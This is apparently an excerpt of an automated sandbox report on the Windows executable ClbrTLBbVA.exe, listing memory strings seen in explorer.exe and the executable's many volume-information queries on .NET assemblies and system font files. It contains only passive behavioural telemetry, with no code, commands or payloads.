          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 0000000C.00000002.537473744.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.317619490.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000002.527288970.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.304955172.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Users\user\Desktop\ClbrTLBbVA.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
